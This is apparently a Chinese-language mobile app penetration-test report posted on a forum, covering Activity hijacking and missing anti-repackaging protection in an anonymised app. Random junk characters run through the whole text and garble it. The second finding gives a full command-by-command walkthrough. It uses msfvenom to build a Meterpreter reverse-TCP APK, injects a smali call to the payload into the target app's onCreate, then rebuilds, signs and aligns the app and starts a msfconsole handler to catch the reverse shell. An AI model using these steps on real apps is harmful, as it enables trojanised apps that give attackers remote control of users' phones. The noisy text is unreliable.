% V% _$ d# k( {$ G# [3 l; g. w/ e6 m( }+ N0 A5 C- }! F+ [   + M0 k+ o- R% x" G 1 t1 |% ?; E0 ~$ K$ \2 y; l

) m2 i$ z; ~1 d. w5 `* V # \) E1 N2 p6 \! O0 ]. ~8 g* U/ ~

( d9 J% s- |% K" j4 z8 t8 \ " F$ a# y1 M e+ Y& b" ^ 2 检测结果                    % B* j4 X4 J) U $ B4 i( ^1 @1 Y/ d

1 B5 z R3 N% m8 ^8 p: |' ]2 E 9 t9 X$ Q' z# g3 A2 ?( b

: F @# Y% m9 O7 g/ ] , T4 h4 T/ l+ y- L- G, ? 2.1 某某某 ) x( z/ U, O5 L6 V0 ] : l# m ]* H, K) k

+ x# K/ e4 K' o$ e ! q" w! a: B6 R. V, ^( d

. g4 Z% P2 v- h8 D' c6 Q' `9 {+ H5 o0 u 2.1.1检测目标 " V& [7 T1 j" ~/ D6 s* l& t; |$ w 4 Q: k& ^% c: X! z

: s/ l$ ]& G: A) _1 M' G & u$ o# u3 V1 W

* L# x8 c8 c& K% Y/ ~ ' y- o) y' j/ c# A" Q0 n0 _" A 目标地址: 某某某某某某APP + ~! r1 Q- Q# n4 i . R- q9 a7 K2 E( _2 q

* X+ E5 V" {8 h6 i, x# k3 g3 m+ w1 _

8 `8 q0 @: X' b: p0 [7 j, \& h9 ~/ o* M& J 2.1.2检测结果 / k8 \" I! T7 a5 M5 I2 Y 9 u: G, B! x ~# |# n+ g

1 m# q' P" k( q$ M# n " p: F) J+ x- t

* N! [6 O# U F0 `0 n5 Y. q6 }) j1 f) n C 2.1.2.1 2 Y; E+ H5 c& M B- B0 X/ ?, \; k2 \" E2 f0 G

" j" E' B; C- x$ j& p( w! B2 }3 l) a) G4 L2 b

: g$ J& A/ U5 e9 Y W& K/ o' Q% I D4 k 0 {7 D1 F% U1 ~3 X2 [" H7 N 漏洞链接地址:某某某某某某APP . {% O: m( C) R; Q( y) B( E+ {" \# L+ c7 {6 x0 R

$ Y, j0 M$ O: e( s2 |. K" B ; J$ e& m1 E2 ?% T: F4 y

/ t- \0 H8 @/ B * n! r3 K d* x) D& _ T( ?   . S# ]1 D7 c7 m O6 H* N9 z* s1 ^ v; \) N5 F, Z+ M

8 a6 _* N- v4 T# K0 D 7 v* A3 s4 j+ e

' I& b0 q( L" B0 n' _+ s5 L9 J 9 N- _! ]0 ^6 p0 z7 V; Z3 v 漏洞分析及取证: & g7 a* x4 ?( p! J- O% X2 P 2 _# l$ H0 \/ L

( p9 d$ ]# P8 Z0 l! | ]# ?$ t! k

; w; k5 o' j2 S4 n4 g 1 F3 F6 H4 b8 K$ r: H7 i) p6 R" ?                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 6 i, i f- p* H. Q/ c$ p) R& U) b & Z6 c. h. d" _$ F t. E+ S

* p- V/ W* s9 O ! X5 i' u0 q7 A3 W3 k3 j$ m

) A7 E( {7 z% X O4 I& g0 A 8 t/ G& p/ @' E" `# t: `, |8 Y* ?      ' `% z% G" W# h+ S2 k - Z% s W/ A& T& l/ r8 G2 t

4 ^- q2 ^7 d4 |; V 0 o( r* r; V% g

) ?, n9 n6 u5 i* P ! n7 ]3 \5 V$ [/ u4 ^                       / x: S- i6 ?' M2 { ; p2 m0 ~7 V. _" R

/ ?5 t J) V6 d5 H . r9 X) R+ q) C# ^8 ~7 h

4 R, W# G& t# N M0 ]" r1 v, M * N* a' ]* b4 c0 f; A G . @) a4 S' A6 y# ?* ~) K9 j% w2 x! A+ r2 \2 _ ~4 [ o

" z/ y5 H9 H, `1 J& ^ : c8 V/ q/ d4 K& n

3 @7 @0 D, G% K1 G. Y + A& ^% X1 A1 L5 q% Z . V& O" w9 F; z/ d0 z7 @% a* l7 G1 g i / z! K- v: Z6 ?! L' i0 a8 K

: f# j1 Z, b2 ~* z: z/ v% c0 h3 Y# F: t

2 b: M5 p# I6 Y+ ? ' q) M* F% G2 V2 | % W4 W( A4 ^+ x( G/ j% ~2 f4 R, E! f& z$ N9 f$ o+ X- k

( s& i9 p9 f) X4 R1 h 0 s& x& \$ b1 b% c& N9 _

+ C' x" G, p. c/ x9 K : e* P6 x$ q6 E0 h4 x! r 漏洞危害:高 & s0 @$ j* q3 d! G4 ` 7 N& t9 m7 I1 j

! q* _+ h+ z7 z9 L, x% r( x8 k" p ?9 D0 Q4 P: \% r
$ {/ A8 ?, P% u1 V0 ~% G. X( t, S9 G4 S( { @ " T# D0 K) p& C; g/ p; ?3 S: i% F9 Q, |8 W" K! _) y5 X2 m3 N8 u7 R2 Z# V3 C# {! @% d* T1 V9 R! w$ \) }' P" M/ C5 G% \7 y/ _2 d# r7 J3 J3 c6 A A1 g3 W) q$ d6 ^! @$ @! n! v* C0 Q% j1 {6 \( o5 b) w' H! Y# b* a* B: r; K! s9 P; U; L; ` M# g) q8 }9 y/ x1 u# W- r1 ?1 R3 a8 m4 G \! B! C0 Q! K+ w* O4 A1 X) j/ s9 Q0 M0 \: w' R3 S$ q! u' G+ z* M( ?- e7 b+ N5 V; ~3 i/ A* H# o: k3 f8 J" Z; a9 v( [5 T$ U% H& C+ t& _! J8 R' N( U2 B& T: ]' Q/ M" A; U! Y$ h: ]$ B3 _) C6 z7 ]1 U+ k% d% ^9 h; N4 V5 M' N3 Q) ^3 |3 v6 ~4 M+ a1 V" N' H8 p. K; [8 @$ b! l3 [4 Q+ W/ E3 s7 A6 Z* ?; [- _6 d2 |) k) E0 c2 w9 x3 Y7 i0 M' y* J" r7 W% W
, G* {/ x2 f3 m% H+ h& | " ]0 {8 z$ v& g8 q# ]$ }

) |+ g1 J5 V$ z& g& \3 w. w 2 N/ Z8 f+ R, ~! L0 M- m 严重程度 9 A( t5 u: ~. t- d! e7 s! A6 [- ?6 t2 Y

, g0 @/ a9 l0 N" M- J& ~- V 4 }8 s+ J: {6 P& ?; e
8 B/ } }# T, @3 R( U, K( g 6 {, l8 L% K% E% i

) X; [: t" o- i2 c* O$ {' S9 O # N+ v$ B6 x7 a7 ?+ V & x N$ f: Y! B. d2 @1 { ; [" |. o( G( y+ }& ^

5 f' w9 x, s( X- v! p4 J. c+ g
O: F0 h2 w3 Z7 w1 F # i3 `. U: O5 \& F7 U0 M/ p( o- q

# r" i- Z7 M9 [) l$ n$ Q # B$ X+ o. Z1 L7 n; N# q * M# @: x3 f- [ 8 h+ m' Y7 x& O- H3 R

8 I; k# [) R' c8 k0 X9 q. Z . e2 a0 H: C8 ^. W
8 n& j/ Y) ~3 y0 I( `9 O1 g0 e 4 Z. P) q0 ~$ m$ z

! H8 X! q; v2 x, l5 `2 s6 L T9 I1 t4 H 0 W2 [0 f. W* R% f" h. t 3 d& `4 R5 b& }) T1 |0 s+ \

. P- R% r: F# X 9 |& }* l" V% P) E4 {6 U0 i
5 O: ~" z6 T p" ~4 M- p 7 K0 s# e5 A+ E7 T8 ~

; E3 A E6 _( j3 D; h& ?* F8 l7 ]% A " S: a1 I; T" i$ ?' J- O4 S; w   6 F3 `" h6 j) _" k( R: Z& f$ a3 c

3 s2 j+ _0 \* V$ q/ t' K0 ?8 O % B. D' W+ W1 V" W# m
3 p; i0 |2 b; e; z5 _8 g6 k6 [ ; d6 H3 w/ I8 K

* o1 y0 r7 S9 S5 q$ \7 L " r n' O/ ]) X2 A% I7 p 6 z6 _. P: {0 f+ z/ ` ! Z$ O) a% b" t3 F# O0 T7 ?

+ ]' t2 l4 i" e+ }6 b9 u$ P i3 u$ E
3 q7 p, P; |! v0 B% Q9 L $ \- ]. r/ V9 t' y; y7 C# B6 b

) g0 @: s8 \# y- w G6 n Q, [* m7 L2 q5 n. ^" ^& |   2 f3 s0 B6 v. i8 U2 q L7 o% r" S! k, V& W

- J. Z" X2 T# [# L3 x$ i! k7 `+ P- l9 R9 j% Z' v, s# y' P3 ?
3 G" S( j3 [! H$ e k6 o 2 E {. q6 X8 o' q* S3 k
9 _. P- [) j. U+ h0 ?1 U8 z, S% y( }3 N- H$ X

( W3 j- l, R9 a; Z $ I2 H' j1 V1 Z; f T   0 G* N3 _8 u6 U1 G + i# Y5 l6 }2 b9 _+ s, Q' n( }

& g3 c) }" C7 H* ` 7 p+ v; X) s2 j: l M- u

' p/ }6 }5 d' t( o/ e. r ' n' l1 W5 P) K% R 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 3 S; q" q9 k: z, F e& \" C* B% F5 A- N' Y b! K5 p3 T7 D

' F0 z& t( S4 n6 c0 d" m 8 \- r# V9 o$ T6 h: T, ?, `

7 x) w' Q, ]( Y + U. P3 J* e) a           & A& n) U- i& Z# d- y6 F4 U ) Q) v% [+ F8 n- I9 @) D% ]

4 H1 ]4 p; ], B* W# U( z- G F( I 5 M/ K7 H) p0 V+ ?$ f$ b

: s& r5 T% I) l% H# [- b. r% C% ^$ N3 s   * ~0 L% V( ^' @% a* H3 [) @0 K; J0 w: V0 {, |" u

/ {. u( H5 a/ \5 S* u+ Q - Y* G# M- V$ q* d' t0 E

" j6 M) e6 D5 `8 z- B# |0 D; s" ?4 y0 E p7 H2 O- G 2.1.2.2 P2 M& N8 A4 ]* ` n! W) s 1 p: [+ F& o0 e/ h8 ^9 X

4 k& J/ e) O" X 3 v) Y8 T8 W# ~" I- f* ]/ {

+ l8 T& z) y$ S$ m E4 |1 g2 M9 [ 漏洞链接地址:某某某某某某APP 6 K" V; g" Y$ Z+ C( b( T P 2 e, k. c& Y; o$ K1 W

& I* m: e3 g- V$ k! | ^: P " {& V9 k' Z5 h3 t

/ I+ o8 c# U$ q8 _+ H/ E + I$ G4 R8 a% m9 o6 t1 x) E 漏洞分析及取证: 8 f$ e- L( U; N& i$ k2 W5 i z , m2 G5 h& N. E w' v5 ?1 V

% R- ]$ u2 T/ i- v3 y) y# J( S ) @8 y/ m" B: e+ D. @6 o

9 z1 O- [. v" j0 E ^8 M" c3 D! p5 g" }+ f4 X# p4 Y                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: $ C! M" T: a. ?0 r. [* `4 s5 g8 W y! [' J$ i6 F6 o

7 \ [3 K n7 L" j1 N 0 p2 O7 B( A8 a4 q: d

* i* Z6 { s3 g. a# B% c9 J . u, j# B7 C+ o' r. c' n Metasploit 生成木马 apk : I: c8 R; h$ _4 S0 r9 K R$ y. W0 Z

! Z: P2 Y- G ?" V 4 Z% Y; c/ n# V/ q' D4 t% s9 m

; I. G2 R4 t2 R1 k/ Q 9 \0 w1 O/ F& l msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk : q$ N0 p S* L h; x3 D; _* Z3 n1 S( v7 q4 B- Y- h% J# z

9 s1 I7 x M3 S% E* V8 _" ]$ l " W; |7 O( [3 h6 U1 X" `- u5 `

$ n0 m- H+ C2 \, W7 H/ o/ s5 F- ^6 F8 q; o' f 反编译目标apk和木马apk ) Y% u' M; G. L; |8 w $ C9 O; s8 `3 r6 s. {, X9 `" E

, e6 }' N3 _/ m, E 4 l1 i& k7 R" ~' i( L& e

: a4 }. k$ [ _& ~ + m8 e: k( M; r6 i apktool d target.apk
7 g/ f; F D- n `6 S0 t ; {1 V/ a f O apktool d cockhorse.apk
& G, U8 [4 s9 u( W+ B / ]6 \8 z/ B' v/ p1 }8 d6 c8 I

0 u6 c, a6 W7 q& n2 {8 v $ F% _# T/ V/ H+ L" A

5 ]" o: ^, C3 _- O6 }; c6 J6 W, r" d' o5 o$ L 木马 apk 注入目标 apk 0 E, F; J/ c4 ^2 l7 S0 Q. m7 ` & f% j! Y1 g7 ~/ t. p9 ]7 f

% Y0 i3 l0 K6 u' e5 N6 \, B( K : `: ^% x) l# E1 H) t# s! e

" h9 P S/ D }* Y9 v9 c" E : A# b9 ~* o# c1 G4 c8 i0 I" t 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
4 Y. @8 s3 c( x2 C. f# L' u% w/ I7 u ! r$ x' u4 e: t. A; E9 i9 S- W! s2 z( x8 [ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 C6 _0 t; b& V* F6 t 7 ?5 A6 Q4 P9 n0 k( U2 p3 I/ x2 L

& E$ [5 f0 d0 w% Q5 p. Y+ X3 r( g: I1 Q* i

7 c) \$ N! _; Z0 ?6 F ) `/ b- T8 M: j5 j0 j3 ^ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' U* \: y( T0 E) I. |/ w: I0 \2 B* i, M* g+ n6 K" @

8 {7 C# t6 |+ P7 b1 G' Y6 l' K : ]. P- j y5 w6 ?. o) x! C

: K1 l( ~, N) A, v 4 e) d5 r/ U( u. {" K7 n 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ : H! p% g& l: W) j5 h " F( a# O( H, V% j2 @

4 J+ U5 I, ?. H7 @ ) h4 {4 Q3 p) K8 o" q7 d% P

9 T, s0 Q/ K* `$ n. N& {* p$ @7 X1 ^/ c3 H, c 回编译生成最终 apk - z; u& O$ ?) a; C/ h( p 2 A' J' ]% T) O. r6 a

8 \/ N& B4 B/ Y* I& _: I0 m, m) i' M0 m* Y+ H* ^

e0 K5 X C! c7 n I; l# I; C: F- b 重新打包 + ~/ Z* v/ ^" {( C- v / |, m. x3 n8 N4 }9 V5 P' x

! s/ x: c/ |; V2 u+ ~" j / ?2 r5 P& `! m/ S# Z

. d; I# P0 G6 W9 y % \( O: v. ^4 h0 E apktool b -o repackage.apk target_app_floder ) R7 Y1 z5 L( x 3 |) M* v! O! O9 @2 y, s

6 q' X: E. Q# u: p- X7 j$ @ " R# L) {4 y6 H

8 T' h7 R# u0 x$ P( l % h* S' V; ^1 F1 Y+ G 创建签名文件,有的话可忽略此步骤 4 K& W% j, l* R9 t& e - Q' o r& N( C- T0 T

! |3 S5 k" {( ~ 4 h6 \# ?" X( O( G+ U0 B) \

' p" f4 v, l+ ` $ g# R' t2 i! R; x1 J8 T keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                4 F) v' x0 t9 w6 Y: i % P6 Y, o& K( C1 y8 @

1 v9 s9 D/ ^5 P- ]5 w) [$ l ) ]( w0 N( l* Q* k

5 y' [. p' M& r! z$ U$ H ? 1 z, t) J/ F& {8 {" E 签名,以下任选其一 / T0 I' \, L4 W6 m! _. f& X 4 `) A6 W' q5 a

8 n( U* W4 _/ V& g: Q' S6 \ & T1 q/ v7 S5 ^0 @4 o

% u' i9 w& f) @/ m8 i" ?! z: A* T8 o. W* i# w0 B; ?6 _ jarsigner 方式 ; k( A, q1 |. }: M* j! E5 R2 z7 ~1 P% U! M" p- E0 J

' X2 N1 H- |0 N; j" @& T8 @( X- t5 F4 {9 ]5 x

0 F- k [* P& ?; k2 {# a z E/ C; c, \; j! V8 M6 f jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : g( ^& W7 ^1 m( H1 A ! K, i( Y$ e9 G/ g% k' E

4 h% y: O+ W4 R, [) s : ^8 `- A; J" a* Z- B

$ j. P. w! P$ F! h; m * f; P9 S3 w* F& t& |" } apksigner 方式 / @0 |! |' l, r+ ]. D 6 K3 l: {" o" @0 M" E

0 o5 ?6 U7 ^1 P7 t2 k% a + G. p* e+ O( b6 A7 m- H) k J* q

! ~0 g: Q! i% V5 B8 K- ^9 N ' y: f6 ?. `1 l" ` apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 1 g4 Q c! g, `* u; O! @4 C1 q; ]5 E 3 {# h9 k% d$ y8 Y& {

1 Y+ V0 Q7 B) y3 \" U. ^* o* H6 ~% e% V* N, Q. I0 C2 h' |8 D& f

: K5 |3 I$ a% N / O M- S: L* ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false 2 u/ r1 a0 D9 |' \5 e+ D) P/ v9 S3 j# S6 g3 ]/ I/ D

2 s. B: g. J, B4 h! q0 }, f7 k' M 8 w0 X* t, u! K( b

3 B# i2 D1 w# I: x0 l $ C9 f, N/ [5 X4 _* W8 ] 验证,以下任选其一 , Z- [ w8 Q, `- M" V( r % v) V) Y3 |; C1 H+ r5 h; z

) A/ `/ k# T ~, R$ l/ V 7 r% G Z& u% k& O. Q

: {/ Q9 o( o: O4 K: }3 Q" o! B ?' N; C3 I- E! ~ {7 \- { jarsigner方式 , s. g2 p' k, m" N & t9 n3 M+ T4 T U9 B

4 i, y% c! Y$ f0 ~$ A ) I2 @# {& P+ h/ m I8 P& ~! ^ ?

" Y$ {2 b; _, z/ X3 }3 k( h# { B4 l0 }* ?( A5 v* b& h `% S5 l jarsigner -verify repackaged.apk : F1 F; H" M7 l) k6 ?$ _$ Q 4 h' S, i9 J- T/ G' t6 q

, K% v! |! g# E9 O* O4 N7 R. N- r 9 p5 a$ ]! B& K' s: T

3 j, i& ]9 Z: D% O- e1 f) F/ V$ P; x; O' U3 o g7 i4 \) y apksigner 方式 * }# t1 ~- D. F" z' S! n / z# R" j* ^9 P0 D. f/ `0 Q) Z+ I

. z% a$ c+ d/ |+ F/ k2 @ k4 J$ X! a' y, _

4 }" N3 {. ]1 E - R1 f7 J& f7 P apksigner verify -v --print-certs repackaged.apk , @9 \. y, W" |% e" y! J. p, m. p6 p4 q- Y5 Q

4 Y+ U# g; l+ n: g c; K5 Z( c+ X* X3 L1 V

3 ^0 U, J! o0 v5 A; `; o# K3 q8 W0 e0 q9 ~5 m keytool方式 & Q0 w3 u# |7 t" S% d9 l8 f 6 p3 K& _/ C5 o6 a; |1 E, }8 f

$ H3 P2 i v' b# \ 5 u; H" [$ }* c3 Y

1 P' B9 {% }9 P- x# K6 Y. @, m8 A % U% X: C' U! S) n/ p, S keytool -printcert -jarfile repackaged.apk 8 p/ H# U( h* _- D 9 G7 _4 N M# H' ]

( t, W, i* f# D * f" M2 K" Y( ^# E+ E t

/ X' B/ E, K0 } 7 n' `4 j: C. e! M7 c$ h; B 对齐 9 Y G& r% |% R + ], q( P( ?& x) J- {

! N+ P* }. s+ |. K) m0 L' B, r. @7 W, U- ^3 d

( R% ]6 @# u: o7 A 2 Y: p2 w8 k5 R* k. l 字节对齐优化 % j( W) x; g' b% u" ~1 u3 [% f$ o( n

! _9 Z1 D3 ]6 w+ U9 Q% D; h1 \1 @& p 1 o; ]6 G) \: K j$ P/ |" X5 l0 q

% z- T# e7 e* e/ ^# v' u * f) D t0 o" K6 n zipalign -v 4 repackaged.apk final.apk 1 j1 Q. G8 ^) c1 b% U5 n; X1 V; B! s3 F) G: X0 ^& L

" F' Z6 p4 M; V1 x7 [0 s+ g $ A, I! G$ ` W

7 |) W$ ~/ z9 W5 V6 M: q1 ^ : N" @7 t' w, E' e- t% b. K 检查是否对齐 % E6 t" Q4 ?' R 7 Q# G2 x% M, h5 {" e* |" o

: f) I( B2 O+ P* O3 Q ' L7 H$ [* O# ?" D

0 X; U* ]% H, Q0 j 8 |# O" H0 F& R) {) k+ g$ o zipalign -c -v 4 final.apk 4 |8 F R' O7 N& ?" A; \- G9 K* d: R: x, L$ H! E% K/ _! I" K0 x

. S# s8 J$ ^ Q $ b/ ?$ n8 p3 f5 c3 ^$ i- C

; R. H% o# S4 S" v ) _' o5 {9 y. m# h1 r3 H F) [1 b0 G 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 3 Y# P9 b5 |9 b5 J/ o i0 I# F" u+ A; `) j5 o5 J

% W& l8 Q- x# `; b" w2 j6 e6 Q6 T7 I

! R. p4 b6 X' Z+ c$ y. [7 j$ | ; J* Q p& d2 v9 {4 T# v7 t# Q 启动Metasploit控制台,配置参数等待上线 ; H* a9 t/ o# J) x2 w 1 A7 y# I! H1 b( ~9 M; [

4 W& T+ h& `* d5 w D; o , ^2 v+ Q4 h) U2 v- `% z- G' C

" V9 U6 L1 B+ K/ F% K( l8 {& G* m 在终端依次输入如下命令 ! o& y# I7 `# `1 [. P6 m4 c/ R/ F- K9 B& z0 {" d

+ K1 p, v/ \7 @' {2 N6 f* c3 U. Q. d/ X6 D$ T: |7 u9 E: k% i

4 `8 y9 f9 r4 p# \8 K) u3 P1 E ' S' V' O- g5 F' u" B* i msfconsole , h, l9 Q& E. S- \1 b* w2 E" z' }% l8 A6 l) O) e; R: k

, j5 ^4 Z, R7 B% q8 r% _ k5 Y- H$ E3 h, o/ [0 O

8 [9 X" W. }9 m ) ]9 L) U) Z \: G t use exploit/multi/handler % |6 S9 u( @9 e9 \ F3 g5 E 0 L& K: b9 ^ y0 q

( F Q# m' m. J1 J& x8 x + r/ F9 W2 h) Y, Y) a/ L$ I* w" r! c

/ w, V/ w$ k. k3 _5 V) f 3 O2 t6 ^" E/ \0 f2 R/ J4 q set PAYLOAD android/meterpreter/reverse_tcp 0 I1 R9 L% ~* k0 v5 O$ ^, V' U6 S& [( c

8 Q. [' i, ?% c! F' n: G4 P7 F . m) K2 J. C7 \1 m

3 T6 B6 k% W' }1 T6 b, E4 V2 ?+ p + h3 T2 U$ `+ p$ | E( U* K set LHOST 192.xxx.xx.xx 2 T. L8 B7 A6 s9 Q" Y# I7 Z # ]( Q' e! d1 N! H1 `4 P* K

6 _; B8 k: j* N' } 6 U+ b5 _9 @+ u) i; m" b/ P6 G

1 Q3 h* i+ y* P. h8 Z K , G0 y- n6 |1 l' u3 P: w3 T5 ] set LPORT 4444 ( n0 s/ M/ \ T! Y. P . @/ a$ c% T+ W9 U0 ]0 O, u

* X. V9 T! p4 g 5 c$ Q9 t$ a7 J6 Q6 g

- D; t& k$ _3 g; K4 Y% J" L ; r% z& {0 F' y) k exploit " Y) ?* E1 j4 n% R y u* {* j) A5 l9 U

7 s& ]/ B1 s; } % S1 c1 u4 O7 Q: u: n) I+ U, U: q

: Q0 A( m# [# @ ) w, Q+ T' e9 J0 [% E& o2 a7 ? 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ; j2 R l% S% V$ h4 ?, c* q 8 x* l2 i, ]& h, t7 m+ F; X; f

" h0 c8 P% H1 D 8 d/ Y& ]7 O- [+ L3 i" \8 X& ^

) }/ g9 I. x' V/ b; J3 i 8 ]( D, v8 r& K$ d& p/ e 漏洞危害:中 # s4 e% D$ h7 @$ x4 x) A ; J+ ^4 O( W+ @' t, E9 i0 {

" k' L0 h, x% X" `/ B 0 D$ ?( t3 y7 P2 c
1 ~- K: [6 B4 |* ^% T" T6 S7 } & ]% X P! N& Y5 @ ' D( Y+ t* v& ?: q+ Q9 g ; H. I# u' p3 U! N$ W 5 Q! Y# O2 l9 S9 T9 c; ^8 I0 [* C+ f& {% {5 m1 }7 d6 m4 A5 D; f2 o2 K ^+ h; m. e- j, G& N; U6 A3 T3 i" T8 |, O) @. s0 b! y; t1 i. X. j3 G3 v! Y3 X5 a: o- P$ }1 W8 W3 F) @" R) P2 E+ b$ H$ ^3 P& m" U- U9 H2 u3 ^4 V7 n& J" d. v7 i& {0 S! }# l. {8 A1 t- P# z9 r2 ^" h- Y, ~+ d( G6 i+ m X4 R3 t* L e+ ^6 C9 B0 C# h- h6 F" X, {, i0 F' f$ Q; z3 J' A5 J" G' r5 u4 p2 ?5 ?* _/ a2 a4 d. i4 p7 w, G5 ^; S# B/ G& D- _! F' `6 E- l y4 l+ T3 r G! L# U3 ]' d {( U% i" @. C7 ?' t a) z' L- b( d/ X- m' y4 l2 H" [4 q& Q3 s8 @* B8 n1 i% y6 F* j8 {( j& a% \5 V" L9 e, i, N9 ~
. s. B8 `6 U; a! q / b3 T) V7 [! S: X. N h

! e F. ]& M7 ]7 A/ I' M, t1 K3 ]4 Y/ L 严重程度 5 E6 @, ?- P, h. o2 l. n1 |) j9 H1 `1 ]9 B7 q, @0 J2 p! \

7 H) ^7 I3 _7 `6 f/ j; I 7 d/ e+ r6 x1 |9 |0 M
Z% z' @% O) a . b8 n, a: r. [- o' R$ R& B, k% ]

t% x7 U' u( L1 l0 @7 u" a 3 c' Y, g$ E! ~4 N 7 y3 z; ]+ d; e3 H' j9 I: X+ H2 D4 n" Q7 B% C! r" O( u

8 v& Y! e) J% O. z; L6 `. e3 v, T2 {6 W$ @6 `6 Z) `
, i; v8 p) V2 i- r ) P" k& @" K2 U8 [( b. X9 m

: b6 l P$ t9 {) s* ?4 I+ `6 q- P% l* A 2 p- i0 Q' }! F2 ~8 Q 4 R3 ?$ ]9 y" E, i2 O1 D0 M

( e6 v. B! z8 T* ]. j6 @7 |; q- ?8 L" }! Z \2 y1 J* C3 S
% F }, n6 k1 q9 I $ }4 q C& z4 L

0 b% {3 x) V4 f \0 \. F. e: U7 Z5 m, A ; b( k8 l" O% A! d0 ` 8 D9 \$ G4 y3 f9 R4 L

V1 F4 R: U3 B3 c, J# T! l 7 [ z4 Q5 w, L
; y7 U6 z6 r Z5 B * F& U: L" X1 \$ w T0 @& F. x, e. R5 ~* G R/ {) ~- P' }! ]1 T

$ a9 S1 v' v9 t( b4 n( X- O8 N3 D3 N3 X. \   2 o5 _( i; f7 [8 p3 u$ h/ e+ |: W" g. p3 |+ H" O7 W$ a2 N9 c* e6 g+ J! O6 W

' |1 H8 {' n8 J/ v6 O3 O6 u ! J3 p5 t" l" [
7 w! k7 Z. C0 r9 x- k , N. r4 ?8 B! u. q& J* B$ M

, y1 w$ h: v' N' A( `9 o" {: I/ u, |) J" C; \2 | " I8 I$ O. Z: K5 y3 B D U% E: q, V9 S& K) R

% Y% ]) c8 b& \* l4 c3 \ 6 X: u" A* e6 W' ], R, s* Y* j- ]
& P3 P# ]+ b& {+ M$ q# P. q 8 y' R2 K- D5 D) u+ r6 P! d% U 6 U' k7 F# U9 | " c3 c/ \1 J8 T# w9 ?* b# x

$ k, r1 f! a4 c2 X2 i1 c 0 E7 R, B7 o+ [: S- c6 i1 F   3 ~7 o( I0 I# b+ N! y ! k& r+ z6 D: c+ V/ F5 ?

- g! K6 B9 c! \+ m' q ( B; e2 W8 w$ ]
, A+ b8 V. o0 q3 ?2 Z , w3 X3 a5 Z8 P* A% M. f
. H6 @- e5 u* u D : C* h v9 w, \& C g

) ]* Y1 p: D: _5 t7 X% _8 a4 e' B0 n3 Y; ?1 P V) x   ; Y/ S9 E( ?; }( A4 C % h, `5 E; F1 T

& k0 a8 h" W5 x7 L! R4 q& x2 V( ?* G

5 h8 J" ~3 P) \, s! b 7 }9 t9 K5 I$ h m/ O$ h C 修复方法: 1 ^* o) c" b+ F7 V% g) W " M8 v! n1 k$ r' F, r7 f* V

- ~* Q: M0 T# m8 N K1 F; O9 l5 Q! C. c; D+ {

3 n. T) {' Q9 m R4 \2 v 8 L0 X- f, t& j# m& ~0 }: `* q6 v               1. APP 启动时应做签名校验防止二次打包。
# c5 l$ h- C$ G/ A0 s" V % t% z" E" w+ ~6 K) G 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 8 e* I- O/ L4 E) ^; ?7 B- [: U0 @/ z' k$ [6 ]; Y

/ t: y& u0 i1 r- q) X 1 u7 d) q/ M+ e1 U# b/ }! H 9 `0 o/ t( w: V7 U) L6 v% `9 L ' D) }( d5 G. U. U( V( X9 d

3 Q2 k: R$ o w, [5 w+ T" W: q& K5 p- ^2 U" z6 z   $ B( e! W/ e! c 1 I% l( D& l2 |' E, H

$ J) C* e4 ~( E' x1 ? F* `( B# B 1 W! @8 z) D( \* B * s# n- k& x. {7 W/ U k6 E' D% _ ) r* o. a% I2 m3 c( Z' _2 ?

) V4 R- [) Q8 I% \/ W P- b. z5 I! w8 a# m5 I* }6 X$ i
2 S% K% p+ i. U; j* x! o - O+ A1 M& h! a6 e6 k

/ w1 l+ j! P1 i 7 s& _, {& F6 C3 s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表